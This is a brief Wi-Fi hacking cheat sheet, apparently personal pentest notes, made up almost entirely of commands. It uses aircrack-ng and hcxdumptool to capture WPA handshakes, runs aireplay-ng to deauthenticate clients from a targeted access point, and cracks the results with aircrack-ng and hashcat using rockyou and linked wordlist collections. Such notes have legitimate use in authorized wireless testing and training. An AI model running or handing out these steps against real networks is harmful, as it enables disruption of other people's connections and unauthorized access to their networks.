Wifi Hacking

Aircrack Suite

Capturing

• iwconfig - Check for adaptor

• sudo airmon-ng start wlan0 - put adaptor in monitor mode

• iwconfig - Check the updated interface name

• airodump-ng wlan0mon - use the updated interface name

• airodump-ng -c 6 --bssid C0:F6:C2:5E:8D:20 -w pass wlan0mon

  • -c - channel

  • --bssid - access point MAC address

  • -w - output file name

• Deauthenticate the wireless clients:

  • Open new terminal on the side

  • aireplay-ng -0 100 -a C0:F6:C2:5E:8D:20 wlan0mon

• ctrl + c - once you have captured handshake

Cracking

• aircrack-ng -w /usr/share/wordlists/rockyou.txt -b C0:F6:C2:5E:8D:20 pass*.cap

Converting to Hashcat

aircrack-ng -j hash NinjaJc01-01.cap

---

HCXdumptool

GitHub - ZerBea/hcxdumptool: Small tool to capture packets from wlan devices.GitHub

Wi-Fi security audit with Hashcat and hcxdumptoolEthical hacking and penetration testing

Capturing

• sudo apt-get install hcxdumptool

• sudo systemctl stop NetworkManager

• sudo systemctl stop wpa_supplicant

• sudo hcxdumptool -i wlan0 --do_rcascan- scan for available networks

• sudo hcxdumptool -i wlan0 -o dumpfile.pcapng -active_beacon -enable_status=15 - capture traffic

Converting to Hashcat

• sudo apt-get install hcxtools

• hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng

• Check essidlist file for name of wifi networks sometimes leaked password - nano essidlist

• sudo hcxdumptool -i wlan0 --do_rcascan

• nano hash.hc22000 - delete excessive hashes and keep only the target network handshakes

Cracking

• hashcat ‐m 22000 ‐a 0 ‐o cracked.txt hash.hc22000 rockyou.txt

---

Wordlists

https://weakpass.com/weakpass.com

SecLists/Passwords/WiFi-WPA at master · danielmiessler/SecListsGitHub

Rocktastic: A Powerful Wordlist for Penetration TestingLRQA

GitHub - kennyn510/wpa2-wordlists: A collection of wordlists dictionaries for password crackingGitHub